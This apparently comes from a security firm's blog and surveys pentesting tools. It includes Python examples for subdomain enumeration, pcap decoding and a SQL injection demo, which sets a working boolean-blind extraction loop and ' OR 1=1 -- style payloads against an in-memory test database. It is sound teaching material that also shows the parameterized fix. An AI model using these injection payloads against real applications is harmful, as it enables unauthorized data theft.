Hacking Tools presented for pentesters

Dr. Matteo Große-Kampmann

As a pentester you need a broad arsenal of hacking tools; they are just as important as a sharp mind and stubbornness. You use them to uncover vulnerabilities in a system and report them to the company being tested.

What counts as a hacking tool?

With hacking tools the pentester sees what an attacker sees and gets a feel for the company's attack surface. This ensures that the system is analyzed the way an attacker would analyze it.

Of course, hacking tools are constantly evolving, as are attack strategies and methods. Staying up to date is therefore already a challenge in the cyber security industry.

Hacking Tools – The operating system

With the operating system the pentester lays the foundation for the hacking tools. The range of options, from an individually configured Ubuntu to Arch Linux derivatives, leaves the pentester spoilt for choice in terms of functionality and stability.

Kali Linux

Kali Linux is one of the best known hacking distributions. It is the successor of BackTrack and is developed by Offensive Security. Kali is based on Debian and comes with a large number of hacking tools pre-installed. Advantages of Kali are its proper documentation and a large and active community.

Parrot Security OS

Parrot is a relatively new player in the field of hacking operating systems. ParrotOS is aimed at pentesters who need a developer- and pentester-friendly environment that also ships with tooling for anonymous network access.

Ubuntu Linux

Ubuntu is a general purpose operating system and is therefore also suitable as a pentesting system. By installing Ubuntu you make sure that only the hacking tools you actually need are installed. However, you also have to install and configure these tools yourself, which is time-consuming and can be nerve-wracking.

BlackArch

BlackArch is an Arch Linux derivative made especially for security researchers and pentesters. It is not very beginner friendly: many tools do not work out of the box after installation and have to be adjusted by hand. If you do not feel comfortable on the command line, you should keep your hands off this distribution.

Hacking Tools – Must Haves

Once the operating system provides the foundation, there are some must-haves that should be on board and functional. From mapping the attack surface to post-exploitation, different tools are needed, and each of them should be ready for use:

Google or another search engine

Google is of course not a hacking tool in the strict sense, but its powerful search function makes it a strong ally when gathering information about a potential target. From CVEs for the software in use to Google hacking dorks that surface unintentionally exposed files and pages, there are many ways to use the search engine for reconnaissance. You should be familiar with the basic search operators such as “site:”, “intitle:”, “filetype:” and others.

Subdomain Enumeration

For every potential intruder, finding subdomains is an essential step. Forgotten subdomains often point at old systems that can be attacked easily. Fierce and Amass are just two of the hacking tools you can use for this task.
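The following Python sketch is an added example, not code from Fierce or Amass, of the wordlist-driven part of what such tools do. It includes the wildcard-DNS check a practitioner needs, because a zone with a catch-all record answers every guess and would otherwise turn the whole wordlist into false positives. The resolver is injected as a function and the two zones (example.test, wild.test) are constructed, so it runs offline.

```python
"""Wordlist-based subdomain brute force with wildcard-DNS detection.

Added example illustrating the technique behind tools such as Fierce or
Amass; it is not code from either project. The resolver is passed in as a
function and the zones below are constructed, so everything runs offline.
"""
import secrets
from typing import Callable, Dict, Iterable, Set

Resolver = Callable[[str], Set[str]]

# Constructed zone without a wildcard: name -> A records.
# The .test TLD is reserved, so none of this resolves on the internet.
ZONE: Dict[str, Set[str]] = {
    "example.test": {"203.0.113.10"},
    "www.example.test": {"203.0.113.10"},
    "mail.example.test": {"203.0.113.25"},
    "old-intranet.example.test": {"198.51.100.7"},  # the forgotten host
}


def fake_resolve(name: str) -> Set[str]:
    """Stand-in for a DNS A lookup; an empty set models NXDOMAIN."""
    return ZONE.get(name.lower(), set())


def wildcard_resolve(name: str) -> Set[str]:
    """Constructed zone with a catch-all *.wild.test record and one real host."""
    if name.lower() == "vpn.wild.test":
        return {"198.51.100.50"}
    if name.lower().endswith(".wild.test"):
        return {"203.0.113.1"}
    return set()


def detect_wildcard(domain: str, resolve: Resolver, probes: int = 3) -> Set[str]:
    """Resolve random labels under the domain. A wildcard zone answers for
    names nobody configured; return the catch-all addresses it hands out."""
    wildcard_ips: Set[str] = set()
    for _ in range(probes):
        label = secrets.token_hex(8)  # 16 random hex chars, not in any wordlist
        wildcard_ips |= resolve(f"{label}.{domain}")
    return wildcard_ips


def enumerate_subdomains(domain: str, wordlist: Iterable[str],
                         resolve: Resolver) -> Dict[str, Set[str]]:
    """Return {fqdn: ips} for every wordlist entry that resolves to something
    other than the wildcard catch-all."""
    wildcard_ips = detect_wildcard(domain, resolve)
    found: Dict[str, Set[str]] = {}
    for word in wordlist:
        fqdn = f"{word}.{domain}"
        ips = resolve(fqdn)
        if not ips:
            continue
        # In a wildcard zone only answers that differ from the catch-all
        # address are evidence of a real, separately configured host.
        if wildcard_ips and ips <= wildcard_ips:
            continue
        found[fqdn] = ips
    return found


if __name__ == "__main__":
    words = ["www", "mail", "dev", "vpn", "old-intranet"]
    print(enumerate_subdomains("example.test", words, fake_resolve))
    print(enumerate_subdomains("wild.test", words, wildcard_resolve))
```

Against the wildcard zone only vpn.wild.test survives, because every other guess comes back with the catch-all address. In a real engagement the injected resolver would be a DNS lookup, and the wordlist the same kind of list Fierce or Amass ship with.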

Hacking Tools – Nmap

Almost every penetration test starts with a run of Nmap. It is one of the oldest tools, but it constantly receives updates and improvements. Nmap is used to map a network: which hosts are reachable, which ports are open and which services and versions are running on them.

Hacking Tools – Metasploit

Metasploit is an open source framework that gives penetration testers a large collection of exploits, payloads, auxiliary scanners and post-exploitation modules to find and verify vulnerabilities. It can also be used to develop new exploits. With Metasploit you can generate payloads and encode them to evade detection systems, run vulnerability scans and launch remote attacks. Metasploit is available as the free Metasploit Framework and the commercial Metasploit Pro; the former Community edition has been discontinued.

Hacking Tools – Nikto

Nikto is included in Kali Linux and many other hacking distributions. With this command line tool web servers can be scanned for a range of issues: outdated server and component versions, dangerous default files and CGI scripts, misconfigurations and known vulnerable scripts from its test database (including known cross-site scripting issues). It can also brute force directory and file names. Nikto is not designed to be stealthy; its scans show up clearly in server logs.

Hacking Tools – Wireshark

Another classic among pentester tools is Wireshark. Wireshark makes the packets on a network visible and helps to spot security problems such as cleartext credentials or unexpected protocols. Individual packets can be captured and analyzed live, with dissectors decoding each protocol layer. Besides Ethernet, Wireshark supports WLAN as well as Bluetooth, USB and FDDI.
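To make "making packets visible" concrete, the following Python decoder is an added example (not Wireshark code) that does by hand what a dissector chain does for the simplest case: it walks a classic pcap file, peels off the Ethernet, IPv4 and TCP/UDP headers and returns the payloads. The capture itself is constructed in memory by build_frame/build_pcap, with reserved documentation addresses, so it runs offline.

```python
"""Decode a pcap capture down to TCP/UDP payloads, the way Wireshark's
dissectors peel off Ethernet, IPv4 and transport headers.

Added example, not part of the Wireshark project. The capture is constructed
in memory (build_frame/build_pcap) so the decoder runs offline.
"""
import socket
import struct
from typing import Any, Dict, List

PCAP_MAGIC_LE = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1


def build_frame(src_ip: str, dst_ip: str, sport: int, dport: int,
                payload: bytes, flags: int = 0x18) -> bytes:
    """Ethernet/IPv4/TCP frame. Checksums are left zero: fine for a file."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + struct.pack("!H", 0x0800)
    # sport, dport, seq, ack, data offset 5 words (<<4), flags, window, csum, urg
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1000, 2000, 5 << 4, flags, 65535, 0, 0) + payload
    # version 4 + IHL 5 (0x45), TOS, total length, ID, DF flag, TTL, proto 6, csum, src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp


def build_pcap(frames: List[bytes]) -> bytes:
    """Classic little-endian pcap: 24-byte global header + 16-byte record headers."""
    out = [struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


def decode_frame(frame: bytes, ts: int) -> Dict[str, Any]:
    """One dissector pass: Ethernet -> IPv4 -> TCP/UDP."""
    info: Dict[str, Any] = {"ts": ts, "eth_type": struct.unpack("!H", frame[12:14])[0]}
    if info["eth_type"] != 0x0800:
        info["proto"] = "non-ipv4"  # ARP, IPv6, ... are out of scope here
        return info
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4  # header length in bytes; more than 20 means IP options
    total_len = struct.unpack("!H", ip[2:4])[0]
    info.update(src=socket.inet_ntoa(ip[12:16]), dst=socket.inet_ntoa(ip[16:20]), ttl=ip[8])
    l4 = ip[ihl:total_len]  # stop at total_len so Ethernet padding is never read as data
    proto = ip[9]
    if proto == 6:
        sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", l4[:14])
        data_off = (off_flags >> 12) * 4  # TCP options push this past 20 bytes
        info.update(proto="tcp", sport=sport, dport=dport,
                    flags=off_flags & 0x1FF, payload=l4[data_off:])
    elif proto == 17:
        sport, dport, length, _csum = struct.unpack("!HHHH", l4[:8])
        info.update(proto="udp", sport=sport, dport=dport, payload=l4[8:length])
    else:
        info.update(proto=str(proto), payload=l4)
    return info


def parse_pcap(data: bytes) -> List[Dict[str, Any]]:
    """Walk the record chain; both byte orders of the classic format are accepted."""
    (magic,) = struct.unpack("<I", data[:4])
    if magic == PCAP_MAGIC_LE:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError(f"not a classic pcap file (magic {magic:#x})")
    linktype = struct.unpack(endian + "IHHiIII", data[:24])[6]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    packets, pos = [], 24
    while pos + 16 <= len(data):
        ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack(endian + "IIII", data[pos:pos + 16])
        pos += 16
        packets.append(decode_frame(data[pos:pos + incl_len], ts_sec))
        pos += incl_len
    return packets


def cleartext_http_requests(packets: List[Dict[str, Any]]) -> List[str]:
    """Request lines sent over plain HTTP, the kind of finding a capture reveals."""
    lines = []
    for p in packets:
        payload = p.get("payload", b"")
        if p.get("proto") == "tcp" and payload[:4] in (b"GET ", b"POST", b"HEAD", b"PUT "):
            lines.append(payload.split(b"\r\n", 1)[0].decode("ascii", "replace"))
    return lines


# Constructed two-packet capture: a plain-HTTP request and its response.
SAMPLE_PCAP = build_pcap([
    build_frame("10.0.0.20", "203.0.113.10", 51000, 80,
                b"GET /admin HTTP/1.1\r\nHost: web.example.test\r\n\r\n"),
    build_frame("203.0.113.10", "10.0.0.20", 80, 51000, b"HTTP/1.1 200 OK\r\n\r\n"),
])

if __name__ == "__main__":
    for p in parse_pcap(SAMPLE_PCAP):
        print(p["src"], "->", p["dst"], p["proto"], p["sport"], p["dport"], p["payload"][:24])
    print(cleartext_http_requests(parse_pcap(SAMPLE_PCAP)))
```

The decoder honours the IP header length and the TCP data offset rather than assuming 20 bytes, and cuts the layer-4 slice at the IP total length, because reading Ethernet padding as payload is a classic source of phantom data in hand-rolled parsers. Wireshark does the same, plus a few thousand more dissectors; a `.pcap` written by Wireshark or tcpdump with the default classic format can be fed to `parse_pcap` directly.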

Hacking Tools – SQLMap

sqlmap helps penetration testers to detect and exploit SQL injection in web applications. It can test different injection techniques, such as time-based blind, boolean-based blind, error-based, UNION-based and stacked queries. SQL injection occurs when developers build queries by concatenating user input into SQL strings instead of separating data from code with parameterized queries, so an attacker can smuggle their own database commands into the query.
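The following Python example is added here and is not sqlmap code. It shows the vulnerable lookup beside its parameterized fix and then runs a boolean-based blind extraction against both, recovering a value one character at a time from nothing but "rows came back / no rows came back", which is exactly the technique sqlmap's boolean-based mode automates. The users table and its rows are constructed in an in-memory SQLite database so it runs offline.

```python
"""SQL injection: a vulnerable lookup beside its parameterized fix, plus a
boolean-based blind extraction loop of the kind sqlmap automates.

Added example (not sqlmap code). The users table is constructed in an
in-memory SQLite database so everything runs offline.
"""
import sqlite3
from typing import Callable, List

Lookup = Callable[[sqlite3.Connection, str], List[str]]


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users, one of them an admin."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,
                            password_hash TEXT, is_admin INTEGER);
        INSERT INTO users VALUES (1, 'alice', 'hash-a', 1);
        INSERT INTO users VALUES (2, 'bob',   'hash-b', 0);
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> List[str]:
    """String concatenation: the input becomes part of the SQL grammar."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, username: str) -> List[str]:
    """Parameter binding: the input is only ever data, never SQL."""
    return [row[0] for row in
            conn.execute("SELECT username FROM users WHERE username = ?", (username,))]


def blind_extract(conn: sqlite3.Connection, lookup: Lookup,
                  column: str = "password_hash", target: str = "alice") -> str:
    """Boolean-based blind extraction. The application only tells us whether
    the lookup returned rows; each round turns that single bit into one
    character of the secret by making the WHERE clause true exactly when the
    guessed character matches. The trailing '-- ' comments out the closing
    quote the application appends."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789-"
    recovered = ""
    while True:
        for ch in alphabet:
            pos = len(recovered) + 1
            probe = (f"' OR (SELECT substr({column},{pos},1) FROM users "
                     f"WHERE username='{target}')='{ch}' -- ")
            if lookup(conn, probe):  # true -> the OR makes every row match
                recovered += ch
                break
        else:
            return recovered  # no character matched: end of the value


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, "' OR 1=1 -- "))
    print("safe:      ", lookup_safe(db, "' OR 1=1 -- "))
    print("leaked via vulnerable lookup:", repr(blind_extract(db, lookup_vulnerable)))
    print("leaked via safe lookup:      ", repr(blind_extract(db, lookup_safe)))
```

Against `lookup_safe` the same probes return nothing, because the whole string is compared as a username. One caveat on the "stacked" technique from the paragraph above: Python's `sqlite3.execute()` refuses to run more than one statement, so a `'; DROP TABLE users; --` payload fails here. Whether stacked queries work depends on the database driver and DBMS, which is why sqlmap tests that technique separately from the others.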

Summary

The hacking tools presented in this article make the pentester's job considerably easier. Many of them are also of interest to developers who want to get involved with security. We at AWARE7 GmbH also use many of the presented tools in our penetration tests, in which we professionally test your infrastructure, application or network for vulnerabilities. We are happy to advise you on all questions concerning digital security.

 

Dr. Matteo Große-Kampmann

My name is Matteo Große-Kampmann. Together with Chris Wojzechowski I founded AWARE7 GmbH in Gelsenkirchen. I completed my PhD on "Towards Understanding Attack Surfaces of Analog and Digital Threats" and am a trained ISO 27001 Lead Auditor.